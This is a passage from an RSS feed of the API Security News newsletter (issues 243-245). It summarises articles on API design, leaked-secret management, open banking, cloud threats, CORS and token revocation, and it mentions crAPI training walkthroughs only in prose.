<li style="font-weight: 400;" aria-level="1"><b>Limited scalability:</b><span style="font-weight: 400;"> Poorly designed APIs can hinder a business&#8217;s ability to scale effectively, leading to performance issues, slower response times, and downtime during high-traffic periods. Backward compatibility is also a concern, as older clients using outdated API versions can negatively impact overall system performance.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Increased costs:</b><span style="font-weight: 400;"> Maintaining and managing poorly designed APIs can consume significant resources, leading to increased operational costs. If an API is not designed to scale, it may require substantial resources to fix as the business grows, further impacting the organization&#8217;s bottom line.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Security risks: </b><span style="font-weight: 400;">Developers often overlook security when designing APIs, focusing more on functionality. This can lead to vulnerabilities, such as buffer overflow attacks, which can be exploited by attackers. If API security vulnerabilities are exploited, it can result in significant financial and reputational damage to the business.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">The author then describes five steps in which API design can be improved, namely:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Prioritize API design from the start: </b><span style="font-weight: 400;">Focus on designing the API correctly, considering scalability, security, and long-term maintenance. A well-designed API can minimize future costs, reduce security risks, and ensure the API can help the business scale its digital operations.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Adopt API design best practices: </b><span style="font-weight: 400;">Use RESTful principles, consistent naming conventions, and API description languages like OpenAPI or RAML. Adhering to the OpenAPI Specification can provide a framework for planning, designing, building, testing, and documenting APIs, reducing the likelihood of design errors and improving overall API quality.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Understand and prepare for security risks:</b><span style="font-weight: 400;"> Design APIs to handle potential security threats, such as buffer overflow attacks and SQL injection. Validate and sanitize input data, implement rate limiting, and use secure protocols like HTTPS. Implement API security tools to monitor and protect against automated and zero-day attacks.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Regularly audit and update APIs: </b><span style="font-weight: 400;">Conduct regular reviews and updates to identify and rectify design issues before they become major problems. Test APIs for performance and security vulnerabilities, gather user feedback, and create new API versions when necessary, following a proper versioning strategy.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Plan for API evolution: </b><span style="font-weight: 400;">Design APIs to accommodate future changes and additions without breaking existing functionality. Plan for deprecating old versions, communicating changes to users, providing clear migration paths, and supporting old versions for a reasonable period. Establish a clear deprecation policy and communicate API changes well in advance.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">From my perspective, security should be a first-class class citizen in the design process. Too often in this newsletter, there is evidence of vulnerable APIs due to poor design decisions, such as a lack of rate limiting or information leakage. By considering these issues at design time, the API can be designed to be secure at the outset.</span></p>
<h2><span style="font-weight: 400;">Article: Seven ways to better manage risk</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the last two quarters, we have seen a steady increase in the number of leaked API keys and tokens. I would be inclined to say that this is most likely the top threat vector-facing API currently. The team at ReversingLabs has </span><a href="https://www.reversinglabs.com/blog/the-state-of-secrets-security-7-ways-to-to-better-manage-risk" target="_blank" rel="noopener"><span style="font-weight: 400;">put together a helpful guide </span></a><span style="font-weight: 400;">on better ways to manage your supply chain risk in the event of credential leakage. The report highlights the magnitude of the problem — GitHub reported a 28% increase in 2023 over the preceding year and also reported a 22% increase in the number of repositories. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report lists seven ways to manage risk resulting in leakage, as follows:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Swift mitigation is crucial after an exposed secret is discovered.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Developers need guidance, not just alerts, to rectify their mistakes effectively.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Certain file types, such as .env files, are more likely to leak secrets.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Automated detection is necessary but insufficient on its own.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">DMCA notices can be used to stop leaks but have limitations and risks.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">AI tools like ChatGPT cannot be relied upon to block leaks effectively.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Compromised secrets must always be revoked, as merely hiding the leak is ineffective.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">From my own perspective, prevention is always better than cure when it comes to secret leakage. Easy wins can be achieved by using a good secrets manager or vault and by preventing inadvertent long-term storage of credentials (for instance, by preventing them from being committed to GitHub). The other key piece of the puzzle is to detect a leak as early as possible and then have a robust process to revoke and re-issue credentials. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a hard problem to solve, but one I’m optimistic we as an industry will crack.</span></p>
<h2><span style="font-weight: 400;">Article: Will OpenBanking transform the future of finance?</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">I have recently </span><a href="https://42crunch.com/addressing-api-security-regulations-in-financial-services/" target="_blank" rel="noopener"><span style="font-weight: 400;">written about addressing API security regulations</span></a><span style="font-weight: 400;"> in financial services, and </span><a href="https://www.globaldata.com/newsletter/details/will-open-banking-transform-the-future-of-finance-_90035/" target="_blank" rel="noopener"><span style="font-weight: 400;">our next article</span></a><span style="font-weight: 400;"> discusses how OpenBanking will transform the future of finance. The report focuses on recent growth figures relating to OpenBanking in the UK, where over 11.4 million payments were processed in July. This reflects a 102% year-on-year growth, suggesting an increasingly rapid adoption. The article rightly highlights the concern around the exposure to risk that may result from this growth via the proliferation of open APIs. As the sector shifts to an API-first approach, scaling without a clear security strategy can harm the entire UK financial sector&#8217;s progress toward API growth. Many organizations lack full visibility into their existing APIs, which are proliferating faster than DevOps teams can release patches or keep up with their API inventory.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article recommends that financial institutions implement a proactive API security and governance strategy to ensure the success of open banking. This strategy should be centered around three fundamental building blocks: </span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">API governance for visibility.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Improving cross-team collaboration between development and security teams.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Taking a multi-layered approach to protect against both external and internal threats.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">The authors conclude along similar lines to my own views, namely the need for a multi-layered approach to API security, as a perimeter-only approach is insufficient. This approach should include measures such as multi-factor authentication, enhanced monitoring, privilege management, and application-level controls to identify threats beyond the perimeter.</span></p>
<h2><span style="font-weight: 400;">Guide: Breaking APIs with “naughty strings”</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, this week, we conclude in the time-honored manner by </span><a href="https://danaepp.com/breaking-apis-with-naughty-strings" target="_blank" rel="noopener"><span style="font-weight: 400;">featuring Dana Epp’s guide</span></a><span style="font-weight: 400;"> to breaking APIs with “naughty strings.” The article describes an attack technique that uses a large list of strings, which are problematic for APIs with poor input validation. Using such strings can elicit unexpected behaviors from APIs, often resulting in information leakage or injection attacks through access control bypasses. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Dana covers the following topics in the guide:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Obtaining a suitably large list of “naughty strings.”</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using the strings in Postman</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using the strings to crack a login form in the crAPI application</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Thanks to Dana for another top article.</span></p>
<p>The post <a href="https://apisecurity.io/issue-245-delinea-patches-api-vulnerability-api-vulnerability-in-palo-alto-devices/">Issue 245: Delinea patches API vulnerability, API vulnerability in Palo Alto devices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 244: Threats to enterprises in the cloud, looming threats to APIs, API SDK generation tools</title>
		<link>https://apisecurity.io/issue-244-threats-to-enterprises-in-the-cloud-looming-threats-to-apis-api-sdk-generation-tools/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 18 Apr 2024 10:56:02 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11110</guid>

					<description><![CDATA[<p>This week, we have articles on the threats to enterprises in the cloud and another on the looming threats to APIs. We also examine the challenges posed by API threats in the utility and energy sectors. We also have technical articles on using AI to hack the crAPI vulnerable API and how to generate SDKs [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-244-threats-to-enterprises-in-the-cloud-looming-threats-to-apis-api-sdk-generation-tools/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-244-threats-to-enterprises-in-the-cloud-looming-threats-to-apis-api-sdk-generation-tools/">Issue 244: Threats to enterprises in the cloud, looming threats to APIs, API SDK generation tools</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have articles on the threats to enterprises in the cloud and another on the looming threats to APIs. We also examine the challenges posed by API threats in the utility and energy sectors. We also have technical articles on using AI to hack the crAPI vulnerable API and how to generate SDKs from your API contracts. Finally, we have news on two upcoming events. </span></p>
<h2><span style="font-weight: 400;">Article: Security threats to enterprises in the cloud</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the </span><a href="https://www.forbes.com/sites/forbestechcouncil/2024/04/01/security-threats-to-enterprises-in-the-cloud-and-how-to-address-them/" target="_blank" rel="noopener"><span style="font-weight: 400;">first article this week</span></a><span style="font-weight: 400;">, Forbes discusses the various security risks companies face when moving their operations and data to the cloud. While cloud service providers invest in security measures, businesses should avoid assuming their data is fully protected. The article presents insights from 20 members of the Forbes Technology Council on the top security threats and how to address them.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article identifies several threats, such as image-based phishing, human error, added risks from homeworking, shadow IT, and insider threats, mostly attributed to human error or shortcomings. The most interesting revelation for me was that for the technical threats, most, if not all, impacted APIs. Firstly, API security itself is identified as a threat, namely:</span></p>
<blockquote>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">API vulnerabilities present a growing threat. Regularly assess and secure APIs, implement proper authentication mechanisms, and conduct thorough security testing to identify and rectify potential vulnerabilities.</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, many of the ancillary threats impact the security of APIs, namely:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Misconfiguration:</b><span style="font-weight: 400;"> Although not specifically mentioned in the context of APIs, misconfigurations in cloud settings can lead to unauthorized access. Misconfigured APIs can expose sensitive data or allow unauthorized actions to be performed.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Unsecured Apps and Data in Development:</b><span style="font-weight: 400;"> Many cloud platforms also serve as development environments where users can build apps and automation. If these apps and their associated data are not properly secured, it can lead to vulnerabilities. This point implies that unsecured APIs in development environments can pose a risk.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Vulnerabilities In Third-Party Software:</b><span style="font-weight: 400;"> Supply chain attacks can target vulnerabilities in software and infrastructure, and APIs, as they are externally facing and visible, are particularly vulnerable to such attacks.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Secrets sprawl:</b><span style="font-weight: 400;"> API keys, encryption keys, and other secrets are often used to authenticate and authorize access to APIs. If these secrets are not managed securely, it can lead to unauthorized access and data breaches.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is quite an eye-opening read for anyone operating modern infrastructure. </span></p>
<h2><span style="font-weight: 400;">Article: API security threats looming</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">We have </span><a href="https://www.infosecurity-magazine.com/news/fastly-survey-api-security-looming/" target="_blank" rel="noopener"><span style="font-weight: 400;">another illuminating article</span></a><span style="font-weight: 400;"> on the threats to API security courtesy of Infosecurity Magazine. The article describes many of the findings in a recent Fastly survey of 235 key IT professionals, including the following statistics:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">79% of surveyed companies place a high importance on API security, as APIs have become crucial assets in multi-cloud environments.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">95% of respondents experienced API security problems in the last 12 months and 79% delayed application rollouts due to API security concerns.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">However, 84% admitted to not having advanced API security in place, mainly due to insufficient budget and lack of expertise.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The study suggests that AI-powered cybersecurity systems could help secure APIs on a limited budget, but only 14% currently prioritize using AI for API security.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">However, 58% anticipate that generative AI will significantly impact API security over the next 2-3 years.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">As Fastly commented, too many organizations are doing too little to counter the threats posed to their APIs.</span></p>
<h2><span style="font-weight: 400;">Article: Utilities and energy companies a prime target for API threats</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Our third article is </span><a href="https://theenergyst.com/utilities-and-energy-a-prime-target-for-api-security-incidents/" target="_blank" rel="noopener"><span style="font-weight: 400;">another thought-provoking read</span></a><span style="font-weight: 400;">, this time on the impact of API security incidents on the utilities and energy industries. As companies in this sector strive to digitize and modernize their services using APIs, they face challenges such as aging technology stacks, lack of interoperability, and poor security hygiene, which create vulnerabilities and make them prime targets for cyber attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Recent research surveyed over 100 CIOs, CISOs, and CTOs from the energy and utilities sector. The findings revealed that 78% of businesses were affected by API security incidents, and there are no signs of the issue abating. The impact of API security incidents can be substantial for energy and utility companies, including loss of employee goodwill and productivity and potential penalties and fines due to the sector&#8217;s highly regulated nature. Over half (57%) of global respondents in the energy and utilities sector have suffered a loss of employee goodwill, while 53% have cited a loss of productivity due to an API security incident.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Energy and utility companies should be increasingly concerned about the prevalence of API-related incidents, given their legacy infrastructure and systems and adversaries&#8217; increased focus on attacking critical infrastructure.</span></p>
<h2><span style="font-weight: 400;">Guide: Generating SDKs for your APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the biggest challenges for a design-first approach to API development is how to transition from well-designed and validated API contracts to well-formed and valid code in the form of SDKs or API server stubs that honour the API contract. In the real world (and in my experience), this translation is most often performed by hand, but this has obvious disadvantages, including:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Time-consuming:</b><span style="font-weight: 400;"> Even for a relatively simple API, getting a working implementation will require a lot of code to be generated, which will be time-consuming. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Wasteful of developer resources: </b><span style="font-weight: 400;">While code generation is time-consuming, it is also wasteful of valuable developer resources that would be better employed to write business functionality.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Error-prone:</b><span style="font-weight: 400;"> Any manual code translation process is going to be prone to errors being introduced.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Non-repeatable:</b><span style="font-weight: 400;"> Different developers will implement the same API definition differently, and this can lead to a very fragmented code base. It would be preferable to use a standard implementation pattern that can be easily understood by the entire team.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Most API developers are probably familiar with Swagger Codegen to perform automated client and server stubs for API contracts. Still, it may come as a surprise that Kristopher Sandoval was able to find at least another nine such tools </span><a href="https://nordicapis.com/10-tools-to-automatically-generate-sdks-for-your-api/" target="_blank" rel="noopener"><span style="font-weight: 400;">covered in his excellent piece</span></a><span style="font-weight: 400;"> for Nordic APIs. Although I recently researched this space for my book, I was surprised at how many seemingly capable and powerful tools are available in this space — it bodes well for the future of design-first APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For my money, I’m a fan of OpenAPI Generator, with its open-source model and strong foundations via its roots in Swagger Codegen. I’ve used it with great success for .Net and Python code, and while it’s not always perfect, it can easily be customized to achieve the desired result.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Thanks to Kristopher for the great contribution.</span></p>
<h2><span style="font-weight: 400;">Guide: crAPIs walkthrough using AI</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">We have previously </span><a href="https://apisecurity.io/issue-242-api-governance-to-avoid-tech-sprawl-api-security-in-digital-transformation-ai-for-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">shared Edward Lichtner’s views</span></a><span style="font-weight: 400;"> on using AI for API security testing, and this week, </span><a href="https://zerodayhacker.com/crapi-walkthrough-using-ai/" target="_blank" rel="noopener"><span style="font-weight: 400;">we again feature Edward</span></a><span style="font-weight: 400;"> discussing how to use AI to assist in a walkthrough of the crAPI vulnerable application.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I’ve seen quite a few write-ups about </span><a href="https://github.com/OWASP/crAPI" target="_blank" rel="noopener"><span style="font-weight: 400;">crAPI</span></a><span style="font-weight: 400;"> and the ever-popular </span><a href="https://github.com/roottusk/vapi" target="_blank" rel="noopener"><span style="font-weight: 400;">vAPI</span></a><span style="font-weight: 400;"> vulnerable APIs, but I’m always struck by the diligence that Edward shows in capturing every nuance of detail, and this write-up is a great case in point. If you’re relatively new to API security, this would be my go-to recommendation to start your learning journey. If you’re unfamiliar with Postman or Burp Suite, he makes no prior assumptions about the reader’s ability and shows exactly how to use these as he takes you through all fifteen of the exercises.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Thanks for sharing this fantastic resource, Edward!</span></p>
<h2><span style="font-weight: 400;">Event: “Building a rugged API security program”</span></h2>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11113" src="https://apisecurity.io/wp-content/uploads/2024/04/Colin-event-promo-may-2024-300x300.jpg" alt="" width="599" height="599" srcset="https://apisecurity.io/wp-content/uploads/2024/04/Colin-event-promo-may-2024-300x300.jpg 300w, https://apisecurity.io/wp-content/uploads/2024/04/Colin-event-promo-may-2024-150x150.jpg 150w, https://apisecurity.io/wp-content/uploads/2024/04/Colin-event-promo-may-2024-768x769.jpg 768w, https://apisecurity.io/wp-content/uploads/2024/04/Colin-event-promo-may-2024.jpg 800w" sizes="auto, (max-width: 599px) 100vw, 599px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I have the great pleasure of speaking at the upcoming </span><a href="https://conf.apisecuniversity.com/" target="_blank" rel="noopener"><span style="font-weight: 400;">APISec Conference</span></a><span style="font-weight: 400;"> on 22nd May 2024, where I will discuss “Building a Rugged API Security Program.” While the API security community is increasingly appreciative of and expert in securing their APIs using authorization and authentication or secure coding, they still face challenges in achieving real change at a program level. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As a veteran of several large-scale AppSec programs at Fortune 500s and currently engaging with some of the world’s largest organizations, I am well-placed to bring my expertise and experience to the topic of securing APIs at scale. In this 20-minute session, I’ll discuss API security ownership (it’s more complex than you think), common anti-patterns, how to define a strategy, and how to take the first steps toward success. Join me on the 22nd of May.</span></p>
<h2><span style="font-weight: 400;">EVENT: API Security Workshop  &#8220;DEFENDING APIs&#8221; &#8211; New York, May 1, 2024</span></h2>
<p><a href="https://42crunch.com/api-security-workshop-defending-apis-new-york-2024/" target="_blank" rel="noopener" data-wp-editing="1"><img loading="lazy" decoding="async" class="alignnone wp-image-11112" src="https://apisecurity.io/wp-content/uploads/2024/04/API-Security-Workshop-New-York-2024-300x171.png" alt="" width="600" height="342" srcset="https://apisecurity.io/wp-content/uploads/2024/04/API-Security-Workshop-New-York-2024-300x171.png 300w, https://apisecurity.io/wp-content/uploads/2024/04/API-Security-Workshop-New-York-2024-768x438.png 768w, https://apisecurity.io/wp-content/uploads/2024/04/API-Security-Workshop-New-York-2024.png 853w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>42Crunch and their partner, EPAM Systems, will run a complimentary<strong> API security workshop</strong> on<strong> May 1</strong> at the EPAM offices on 7th Avenue, New York City.</p>
<p>This 2-hour long workshop &#8220;<strong>Defending APIs</strong>&#8221; provides a mix of educational sessions on the latest API threats and vulnerabilities with practical hands-on tutorials and drills using the 42Crunch API Security platform testing and runtime protection tooling.</p>
<p>Topics covered include:</p>
<ul>
<li aria-level="1">Introduction to API Security</li>
<li aria-level="1">API Security Testing</li>
<li aria-level="1">Securing APIs on GitHub</li>
<li aria-level="1">API Runtime Protection</li>
</ul>
<p><a href="https://42crunch.com/api-security-workshop-defending-apis-new-york-2024/" target="_blank" rel="noopener">Find out more and register</a></p>
<p>The post <a href="https://apisecurity.io/issue-244-threats-to-enterprises-in-the-cloud-looming-threats-to-apis-api-sdk-generation-tools/">Issue 244: Threats to enterprises in the cloud, looming threats to APIs, API SDK generation tools</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 243: Economics of API attacks, understanding CORS, blocking compromised API tokens</title>
		<link>https://apisecurity.io/issue-243-economics-of-api-attacks-understanding-cors-blocking-compromised-api-tokens/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Tue, 09 Apr 2024 16:00:47 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11101</guid>

					<description><![CDATA[<p>This week, we have articles on the economics of API attacks, and how developers can prevent them, and how to create an API solution wishlist with developers in mind. We also have technical articles on understanding cross-origin resource sharing (CORS) for APIs and how to secure APIs by blocking compromised tokens. We also have a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-243-economics-of-api-attacks-understanding-cors-blocking-compromised-api-tokens/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-243-economics-of-api-attacks-understanding-cors-blocking-compromised-api-tokens/">Issue 243: Economics of API attacks, understanding CORS, blocking compromised API tokens</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we have articles on the economics of API attacks, and how developers can prevent them, and how to create an API solution wishlist with developers in mind. We also have technical articles on understanding cross-origin resource sharing (CORS) for APIs and how to secure APIs by blocking compromised tokens. We also have a double-header from Dana Epp to conclude this edition.</span></p>
<h2><span style="font-weight: 400;">Article: The economics of API attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">First up this week </span><a href="https://thenewstack.io/the-economics-of-api-attacks-and-how-developers-can-stop-them/" target="_blank" rel="noopener"><span style="font-weight: 400;">are the thoughts</span></a><span style="font-weight: 400;"> of The New Stack on the economics of API attacks and how developers can stop these attacks. According to the author, APIs have become a prime target for hackers, with 80% of internet traffic flowing through them. Attackers employ an economic model to assess the cost of an attack against the potential returns, which can include data theft, fraud, or the deployment of ransomware. Traditionally, organizations have prioritized securing infrastructure and end-user web applications, inadvertently leaving APIs vulnerable. The rapid pace of development and the shift towards microservices have further emphasized the need for an API-focused security posture.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report suggests that organizations implement an active, persistent, and consistent discovery and inventory process to map applications and maintain an up-to-date list of APIs, as unmanaged APIs present the highest risk. The author also cautions against the unsafe consumption of third-party APIs and emphasizes the importance of API security across various domains, including mobile, Internet of Things (IoT), and Operational Technology (OT) applications.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Organizations can leverage tools such as API inventory products and API compliance products to identify and assess APIs within their footprint, while API threat detection response solutions can help block API attacks in real time. By investing in comprehensive API security strategies, regular security audits, and continuous employee training, organizations can proactively defend against the ever-evolving landscape of API threats.</span></p>
<h2><span style="font-weight: 400;">Article: API solution wishlist for developers</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The second article this weeks </span><a href="https://www.forbes.com/sites/forbestechcouncil/2024/02/29/creating-your-api-solution-wishlist-with-developers-in-mind/" target="_blank" rel="noopener"><span style="font-weight: 400;">comes courtesy of Forbes</span></a><span style="font-weight: 400;"> and features the thoughts of Steve Rodda (CEO of Ambassador Labs) and emphasizes the importance of selecting the right API solutions for modern enterprises, particularly those operating in complex development environments such as those using Kubernetes.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Rodda’s viewpoint is that traditional generic API solutions may not be adequate to meet the unique demands of these environments, as they often have limitations such as poor performance, lack of customization, scalability issues, suboptimal security, limited monitoring and analytics, and reduced flexibility in policy enforcement. According to him, traditional solutions present the following problems to organizations, specifically to development teams:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Poor performance</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Lack of customization</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Scalability issues</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Suboptimal security</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Limited monitoring and analytics</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Reduced flexibility in policy enforcement</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Given these challenges, Rodda suggests adopting specialized API solutions that can provide critical features such as:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Stronger performance</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">High customization</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Advanced security features</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Comprehensive monitoring and analytics</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Flexible policy enforcement</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, before making the shift to developer-first solutions, Rodda advises considering potential challenges. These include integration issues with existing technology stacks, the need for thorough security assessments, and conducting a detailed cost analysis. It&#8217;s crucial to involve all relevant stakeholders in the decision-making process, including developer team leads, CTOs, product managers, support heads, technical writers, and business representatives.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A very interesting read, and I’d strongly recommend curious readers to explore the likes of Ambassador Labs, Solo.io, and Traefik Labs to see the state of the art in API management platforms.</span></p>
<h2><span style="font-weight: 400;">Article: Understanding CORS </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In my recent experience of writing a book on API security, I found that one of the least well-understood concepts around API (and web) security is cross-origin resource sharing (CORS). I’m pleased to be able to </span><a href="https://medium.com/illuminations-mirror/understanding-cors-how-websites-and-apis-safely-connect-3cfbc825fd77" target="_blank" rel="noopener"><span style="font-weight: 400;">include this well-written guide</span></a><span style="font-weight: 400;"> to this seemingly challenging topic.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Simply put, CORS is a security mechanism that regulates communication between different websites and APIs. To understand how CORS works, let us consider a typical flow:</span></p>
<ol style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Before any API call to a server, the browser sends a preflight request to check if the requesting website is allowed to access the server&#8217;s resources.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The server responds with CORS headers, which act as permission slips, specifying the allowed origins, methods, headers, and credentials.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">CORS configuration is done on the server side, where developers specify the allowed origins, methods, headers, and credentials.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Postman, a standalone API client, does not enforce CORS policies, allowing requests to any server without considering the CORS policy.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Web browsers strictly enforce CORS policies to prevent unauthorized access to sensitive resources.</span></li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">In conclusion, CORS errors mostly occur in browsers when one domain tries to access resources from another domain. CORS plays a crucial role in ensuring secure communication between websites and APIs while preventing unauthorized access to sensitive data. CORS is one of those security configurations that should be simple to implement, but often trips up organizations — make sure you test your CORS regular as part of your testing regime.</span></p>
<h2><span style="font-weight: 400;">Article: Securing APIs to block compromised tokens</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of my predictions for 2024 was that API token leakage or theft would continue to proliferate, and there has been no shortage of high-profile incidents in 2024 already. The </span><a href="https://securityboulevard.com/2024/03/top-4-essential-strategies-for-securing-apis-to-block-compromised-tokens/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article from Security Boulevard </span></a><span style="font-weight: 400;">discusses four different approaches for dealing with compromised tokens.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Government bodies are clamping down heavily on institutions that handle sensitive customer data. Tokens are used to authenticate users for APIs. Companies with 10,000+ employees have at least 250 APIs actively deployed, and this number is set to increase by 100% by the end of 2027.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The author recommends the following approaches:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><b>Token Revocation Lists (TRLs) </b><span style="font-weight: 400;">are central repositories of invalid tokens and are used to deny access to compromised tokens. They require diligent management and careful consideration to avoid operational burdens.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Token blacklisting</b><span style="font-weight: 400;"> involves a mechanism where compromised tokens are blacklisted within an authentication system or server and prevent further usage.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Token Expiration and Renewal:</b><span style="font-weight: 400;"> For organizations with limited IT resources, setting expiration dates for critical tokens is recommended. This forces users to periodically renew tokens to maintain access, preventing unauthorized control.</span></li>
